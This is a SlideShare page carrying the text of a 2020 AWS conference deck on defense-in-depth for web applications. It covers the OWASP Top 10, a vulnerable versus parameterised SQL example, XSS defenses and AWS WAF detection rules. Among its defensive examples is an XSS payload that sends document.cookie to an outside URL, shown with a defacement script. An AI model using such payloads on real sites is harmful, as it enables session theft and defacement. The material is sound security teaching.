SlideShare une entreprise Scribd logo

Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx

Télécharger en tant que PPTX, PDF
Amazon Web Services
Amazon Web Services
1  sur  36
© 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. 如何藉由多層次防禦搭建網路應用安全 Lucern K. Ma Manager, Solutions Architecture Amazon Web Services T r a c k 5 | S e s s i o n 1
© 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. “The only defense against the world is a thorough knowledge of it.” John Locke Philosopher
What to expect
Defense-in-depth defined • Multiple, independent layers of security • Decreases momentum and effectiveness of an attack • Requires an attacker to break multiple, progressively specialized, layers of defense • The effort required to mount a successful attack becomes increasingly difficult and costly VPC
Defense-in-depth strategy • Building on a secure platform • Building security IN your application • Building security AROUND your application
Defense-in-depth strategy • Building on a secure platform • Building security IN your application • Building security AROUND your application
Defense-in-depth strategy • Building on a secure platform • Building security IN your application • Building security AROUND your application
Multiple, independent layers of security
Multiple, independent layers of security
Multiple, independent layers of security
Multiple, independent layers of security
Shared responsibility model Customer AWS
Standard protections All internet-facing web applications
© 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. in
Building security in your application First, understand what to protect from Proactively architect your application to protect against these vulnerabilities Have mechanisms in place to monitor and detect when you need to take action
App security: OWASP top 10—attack vectors 1. Injection 2. Broken authentication 3. Sensitive data exposure 4. XML external entities (XXE) 5. Broken access control 6. Security misconfiguration 7. Cross-site scripting (XSS) 8. Insecure deserialization 9. Using components with known vulnerabilities 10. Insufficient logging & monitoring
 Vulnerable usage  Secure usage //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id); SQL injection String newName = request.getParameter("newName"); String id = request.getParameter("id"); String query = " UPDATE EMPLOYEES SET NAME="+ newName + " WHERE ID ="+ id; Statement stmt = connection.createStatement(); https://www.owasp.org/index.php/OWASP_Proactive_Controls
XSS Attack Attack 1 : cookie theft Attack 2 : Web site defacement <script> var badURL='https://owasp.org/somesite/data=' + document.cookie; var img = new Image(); img.src = badURL; </script> <script>document.body.innerHTML='<blink>GO OWASP</blink>';</script> https://www.owasp.org/index.php/OWASP_Proactive_Controls
XSS defense https://www.owasp.org/index.php/OWASP_Proactive_Controls HTML encoding JavaScript hex encoding URL encoding CSS hex encoding
App security: OWASP Top 10—Proactive controls 1. Define security requirements 2. Leverage security frameworks and libraries 3. Secure database access 4. Encode and escape data 5. Validate all inputs 6. Implement digital identity 7. Enforce access controls 8. Protect data everywhere 9. Implement security logging and monitoring 10.Handle all errors and exceptions
© 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. around
AWS enables defense-in-depth
Seller managed rules Available in the AWS Marketplace
AWS Managed Rules
AWS Managed Rules Category Ruleset Description CRS Core Ruleset Based on OWASP Top 10 EXR Admin Protection Blocks common administrative access EXR SQL DB Predefined SQL injection detection EXR Linux Linux based path traversal attempts EXR Known Bad Inputs Well known bad request indicators EXR PHP PHP specific exploits EXR WordPress WordPress specific exploits EXR Posix Posix based path traversal attempts EXR Windows Windows based path traversal attempts IP List AWS IP Reputation List Blocks IP that is known to have bot activities
IP reputation list from the Threat Research Team Threat database Internet Request handling
Raw Request Header Web Access Control List (Web ACL) Rule 1 Rule 2 Conditions Conditions Action Action RuleGroup Conditions: • IP Match, Geo-IP • String/Regex Match • SQLi/XSS Detection • Rate-based • Size Constraints Actions: • Accept • Deny • Count Single-digit millisecond latency Amazon CloudFront Application Load Balancer Amazon API Gateway Amazon CloudWatch Users Rule 1 Rule 2 Rule Z …… … Rule X Conditions Action
UpdateWebACL
New detection capabilities Boolean logic between conditions • e.g. “I want to block request that is coming from certain IP range or coming from certain countries.” Multiple transform • Perform series of transformation on string • e.g. “Before performing string-match on body, apply HTML decode transformation to normalize the whitespace.” Variable CIDR range for IP-match condition • Today only /8 and any range between /16 through /32 are allowed for IPv4 • You can now define anywhere from /1 to /32
Example: XSS and SQLi detection in JSON "Statement": { "OrStatement": { "Statements": [{ "XssMatchStatement": { "FieldToMatch": { "QueryString": {} }, "TextTransformations": [ {"Priority": 1, "Type": "URL_DECODE”}, {"Priority": 2, "Type": ”LOWERCASE”}, ] } }, { "SqliMatchStatement": { "FieldToMatch": { "Body": {} }, "TextTransformations": [ {"Priority": 1, "Type": "HTML_ENTITY_DECODE”}, {"Priority": 2, "Type": ”NONE_COMPRESS_WHITE_SPACE”} ] } }] } } Available Text Transformations: NONE COMPRESS_WHITE_SPACE HTML_ENTITY_DECODE LOWERCASE CMD_LINE URL_DECODE
Audit: allow only HTTPS (443) on all EC2 instances
DemoMaster Account DemoSecurityAdmin Account DemoMember Account EC2 Instance 1 ELB 1 ELB 2 ELB 3 EC2 Instance 2 ELB 4
AWS WAF enables defense-in-depth • Multiple integration points • CloudFront • API Gateway • Application Load Balancer • Multiple defense strategies • Managed rules • Rate-based rules • Geofencing • IP • SQL injection matching • Cross-site scripting matching • Dynamic or static matching • Text transformations
Learn security with AWS Training and Certification 30+ free digital courses cover topics related to cloud security, including Introduction to Amazon GuardDuty and Deep Dive on Container Security Resources created by the experts at AWS to help you build and validate cloud security skills Validate expertise with the AWS Certified Security – Specialty exam Classroom offerings, such as Security Engineering on AWS, feature AWS expert instructors and hands-on activities Visit the security learning path at https://aws.training/security
Thank you! © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved.

Recommandé

Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Amazon Web Services
 
Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用
Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用
Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用Amazon Web Services
 
Track 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptx
Track 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptxTrack 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptx
Track 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptxAmazon Web Services
 
Track 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptx
Track 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptxTrack 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptx
Track 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptxAmazon Web Services
 
Getting started with aws security toronto rs
Getting started with aws security toronto rsGetting started with aws security toronto rs
Getting started with aws security toronto rsAmazon Web Services
 
(SEC201) AWS Security Keynote Address | AWS re:Invent 2014
(SEC201) AWS Security Keynote Address | AWS re:Invent 2014(SEC201) AWS Security Keynote Address | AWS re:Invent 2014
(SEC201) AWS Security Keynote Address | AWS re:Invent 2014Amazon Web Services
 
Dev & Test on AWS Webinar October 2017 - IL Webinar
Dev & Test on AWS Webinar October 2017 - IL WebinarDev & Test on AWS Webinar October 2017 - IL Webinar
Dev & Test on AWS Webinar October 2017 - IL WebinarAmazon Web Services
 
AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)
AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)
AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)Amazon Web Services Korea
 

Recommandé

Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Amazon Web Services
 
Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用
Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用
Track 4 Session 4_ MAD02 MAD 04 如何藉由 CICD 流程管理容器化和無伺服器應用Amazon Web Services
 
Track 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptx
Track 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptxTrack 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptx
Track 5 Session 4_ intel 透過AWS Outposts就地佈署 on-premises 雲端環境.pptxAmazon Web Services
 
Track 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptx
Track 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptxTrack 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptx
Track 1 Session 6_建立安全高效的資料分析平台加速金融創新_HC+EMQ Cliff(已檢核,上下無黑邊).pptxAmazon Web Services
 
Getting started with aws security toronto rs
Getting started with aws security toronto rsGetting started with aws security toronto rs
Getting started with aws security toronto rsAmazon Web Services
 
(SEC201) AWS Security Keynote Address | AWS re:Invent 2014
(SEC201) AWS Security Keynote Address | AWS re:Invent 2014(SEC201) AWS Security Keynote Address | AWS re:Invent 2014
(SEC201) AWS Security Keynote Address | AWS re:Invent 2014Amazon Web Services
 
Dev & Test on AWS Webinar October 2017 - IL Webinar
Dev & Test on AWS Webinar October 2017 - IL WebinarDev & Test on AWS Webinar October 2017 - IL Webinar
Dev & Test on AWS Webinar October 2017 - IL WebinarAmazon Web Services
 
AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)
AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)
AWS Summit Seoul 2015 - 국내 사례로 본 클라우드 운영 최적화 (이주완-메가존)Amazon Web Services Korea
 
Track 5 Session 5_STG03 AWS 檔案儲存服務概觀
Track 5 Session 5_STG03 AWS 檔案儲存服務概觀Track 5 Session 5_STG03 AWS 檔案儲存服務概觀
Track 5 Session 5_STG03 AWS 檔案儲存服務概觀Amazon Web Services
 
Getting Started with AWS Security
Getting Started with AWS Security Getting Started with AWS Security
Getting Started with AWS SecurityAmazon Web Services
 
AWSomeday Brussels Technical Track
AWSomeday Brussels Technical TrackAWSomeday Brussels Technical Track
AWSomeday Brussels Technical TrackAmazon Web Services
 
HashiTalks Africa - Going multi-account on AWS with Terraform
HashiTalks Africa - Going multi-account on AWS with TerraformHashiTalks Africa - Going multi-account on AWS with Terraform
HashiTalks Africa - Going multi-account on AWS with TerraformCobus Bernard
 
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...Amazon Web Services
 
Module 1 - AWSome Day Online Conference Thailand
Module 1 - AWSome Day Online Conference Thailand Module 1 - AWSome Day Online Conference Thailand
Module 1 - AWSome Day Online Conference Thailand Amazon Web Services
 
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...Module 3: Security, Identity and Access Management - AWSome Day Online Confer...
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...Amazon Web Services
 
Security best practices
Security best practices Security best practices
Security best practices Amazon Web Services
 
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...Amazon Web Services
 
(SEC310) Keeping Developers and Auditors Happy in the Cloud
(SEC310) Keeping Developers and Auditors Happy in the Cloud(SEC310) Keeping Developers and Auditors Happy in the Cloud
(SEC310) Keeping Developers and Auditors Happy in the CloudAmazon Web Services
 
Security & Compliance (Part 1)
Security & Compliance (Part 1)Security & Compliance (Part 1)
Security & Compliance (Part 1)Amazon Web Services
 
(GEN117) AWS Compliance Summit
(GEN117) AWS Compliance Summit(GEN117) AWS Compliance Summit
(GEN117) AWS Compliance SummitAmazon Web Services
 
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)Amazon Web Services Korea
 
Moving your commercial databases to Amazon RDS
Moving your commercial databases to Amazon RDSMoving your commercial databases to Amazon RDS
Moving your commercial databases to Amazon RDSAmazon Web Services
 
How Western Union Implemented Security Measures at Scale on AWS with Dome9
How Western Union Implemented Security Measures at Scale on AWS with Dome9 How Western Union Implemented Security Measures at Scale on AWS with Dome9
How Western Union Implemented Security Measures at Scale on AWS with Dome9 Amazon Web Services
 
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用Amazon Web Services
 
(SEC203) Journey to Securing Time Inc's Move to the Cloud
(SEC203) Journey to Securing Time Inc's Move to the Cloud(SEC203) Journey to Securing Time Inc's Move to the Cloud
(SEC203) Journey to Securing Time Inc's Move to the CloudAmazon Web Services
 
Dev ops on aws deep dive on continuous delivery - Toronto
Dev ops on aws deep dive on continuous delivery - TorontoDev ops on aws deep dive on continuous delivery - Toronto
Dev ops on aws deep dive on continuous delivery - TorontoAmazon Web Services
 
Advanced AWS Security Workshop
Advanced AWS Security WorkshopAdvanced AWS Security Workshop
Advanced AWS Security WorkshopAmazon Web Services
 
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013Amazon Web Services
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 

Contenu connexe

Tendances

Track 5 Session 5_STG03 AWS 檔案儲存服務概觀
Track 5 Session 5_STG03 AWS 檔案儲存服務概觀Track 5 Session 5_STG03 AWS 檔案儲存服務概觀
Track 5 Session 5_STG03 AWS 檔案儲存服務概觀Amazon Web Services
 
Getting Started with AWS Security
Getting Started with AWS Security Getting Started with AWS Security
Getting Started with AWS SecurityAmazon Web Services
 
AWSomeday Brussels Technical Track
AWSomeday Brussels Technical TrackAWSomeday Brussels Technical Track
AWSomeday Brussels Technical TrackAmazon Web Services
 
HashiTalks Africa - Going multi-account on AWS with Terraform
HashiTalks Africa - Going multi-account on AWS with TerraformHashiTalks Africa - Going multi-account on AWS with Terraform
HashiTalks Africa - Going multi-account on AWS with TerraformCobus Bernard
 
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...Amazon Web Services
 
Module 1 - AWSome Day Online Conference Thailand
Module 1 - AWSome Day Online Conference Thailand Module 1 - AWSome Day Online Conference Thailand
Module 1 - AWSome Day Online Conference Thailand Amazon Web Services
 
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...Module 3: Security, Identity and Access Management - AWSome Day Online Confer...
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...Amazon Web Services
 
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...Amazon Web Services
 
(SEC310) Keeping Developers and Auditors Happy in the Cloud
(SEC310) Keeping Developers and Auditors Happy in the Cloud(SEC310) Keeping Developers and Auditors Happy in the Cloud
(SEC310) Keeping Developers and Auditors Happy in the CloudAmazon Web Services
 
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)Amazon Web Services Korea
 
Moving your commercial databases to Amazon RDS
Moving your commercial databases to Amazon RDSMoving your commercial databases to Amazon RDS
Moving your commercial databases to Amazon RDSAmazon Web Services
 
How Western Union Implemented Security Measures at Scale on AWS with Dome9
How Western Union Implemented Security Measures at Scale on AWS with Dome9 How Western Union Implemented Security Measures at Scale on AWS with Dome9
How Western Union Implemented Security Measures at Scale on AWS with Dome9 Amazon Web Services
 
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用Amazon Web Services
 
(SEC203) Journey to Securing Time Inc's Move to the Cloud
(SEC203) Journey to Securing Time Inc's Move to the Cloud(SEC203) Journey to Securing Time Inc's Move to the Cloud
(SEC203) Journey to Securing Time Inc's Move to the CloudAmazon Web Services
 
Dev ops on aws deep dive on continuous delivery - Toronto
Dev ops on aws deep dive on continuous delivery - TorontoDev ops on aws deep dive on continuous delivery - Toronto
Dev ops on aws deep dive on continuous delivery - TorontoAmazon Web Services
 
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013Amazon Web Services
 

Tendances (20)

Track 5 Session 5_STG03 AWS 檔案儲存服務概觀
Track 5 Session 5_STG03 AWS 檔案儲存服務概觀Track 5 Session 5_STG03 AWS 檔案儲存服務概觀
Track 5 Session 5_STG03 AWS 檔案儲存服務概觀
 
Getting Started with AWS Security
Getting Started with AWS Security Getting Started with AWS Security
Getting Started with AWS Security
 
AWSomeday Brussels Technical Track
AWSomeday Brussels Technical TrackAWSomeday Brussels Technical Track
AWSomeday Brussels Technical Track
 
HashiTalks Africa - Going multi-account on AWS with Terraform
HashiTalks Africa - Going multi-account on AWS with TerraformHashiTalks Africa - Going multi-account on AWS with Terraform
HashiTalks Africa - Going multi-account on AWS with Terraform
 
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...
AWS re:Invent 2016: Scaling Security Resources for Your First 10 Million Cust...
 
Module 1 - AWSome Day Online Conference Thailand
Module 1 - AWSome Day Online Conference Thailand Module 1 - AWSome Day Online Conference Thailand
Module 1 - AWSome Day Online Conference Thailand
 
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...Module 3: Security, Identity and Access Management - AWSome Day Online Confer...
Module 3: Security, Identity and Access Management - AWSome Day Online Confer...
 
Security best practices
Security best practices Security best practices
Security best practices
 
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...
Best Practices for Managing Security Operations in AWS - AWS July 2016 Webina...
 
(SEC310) Keeping Developers and Auditors Happy in the Cloud
(SEC310) Keeping Developers and Auditors Happy in the Cloud(SEC310) Keeping Developers and Auditors Happy in the Cloud
(SEC310) Keeping Developers and Auditors Happy in the Cloud
 
Security & Compliance (Part 1)
Security & Compliance (Part 1)Security & Compliance (Part 1)
Security & Compliance (Part 1)
 
(GEN117) AWS Compliance Summit
(GEN117) AWS Compliance Summit(GEN117) AWS Compliance Summit
(GEN117) AWS Compliance Summit
 
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)
AWS Summit Seoul 2015 - 모바일 및 IoT 환경을 위한 AWS 클라우드 플랫폼의 진화 (윤석찬, Markku Lepisto)
 
Moving your commercial databases to Amazon RDS
Moving your commercial databases to Amazon RDSMoving your commercial databases to Amazon RDS
Moving your commercial databases to Amazon RDS
 
How Western Union Implemented Security Measures at Scale on AWS with Dome9
How Western Union Implemented Security Measures at Scale on AWS with Dome9 How Western Union Implemented Security Measures at Scale on AWS with Dome9
How Western Union Implemented Security Measures at Scale on AWS with Dome9
 
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用
Track 4 Session 5_ 架構即代碼 – AWS CDK 與 CDK8S 聯手打造下一代的 K8S 應用
 
(SEC203) Journey to Securing Time Inc's Move to the Cloud
(SEC203) Journey to Securing Time Inc's Move to the Cloud(SEC203) Journey to Securing Time Inc's Move to the Cloud
(SEC203) Journey to Securing Time Inc's Move to the Cloud
 
Dev ops on aws deep dive on continuous delivery - Toronto
Dev ops on aws deep dive on continuous delivery - TorontoDev ops on aws deep dive on continuous delivery - Toronto
Dev ops on aws deep dive on continuous delivery - Toronto
 
Advanced AWS Security Workshop
Advanced AWS Security WorkshopAdvanced AWS Security Workshop
Advanced AWS Security Workshop
 
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013
AWS Security – Keynote Address (SEC101) | AWS re:Invent 2013
 

Similaire à Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx

Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsSarvesh Kushwaha
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kimjaxconf
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Stormpath
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730chadtindel
 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets MalloryEmily Stark
 
CS166 Final project
CS166 Final projectCS166 Final project
CS166 Final projectKaya Ota
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...
AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...
AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...Amazon Web Services
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Best Practices for IoT Security in the Cloud
Best Practices for IoT Security in the CloudBest Practices for IoT Security in the Cloud
Best Practices for IoT Security in the CloudAmazon Web Services
 
Best Practices for IoT Security in the Cloud
Best Practices for IoT Security in the CloudBest Practices for IoT Security in the Cloud
Best Practices for IoT Security in the CloudAmazon Web Services
 

Similaire à Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx (20)

Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets Mallory
 
CS166 Final project
CS166 Final projectCS166 Final project
CS166 Final project
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...
AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...
AWS re:Invent 2016: Life Without SSH: Immutable Infrastructure in Production ...
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Security in Node.JS and Express:
Security in Node.JS and Express:Security in Node.JS and Express:
Security in Node.JS and Express:
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San Francisco
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Best Practices for IoT Security in the Cloud
Best Practices for IoT Security in the CloudBest Practices for IoT Security in the Cloud
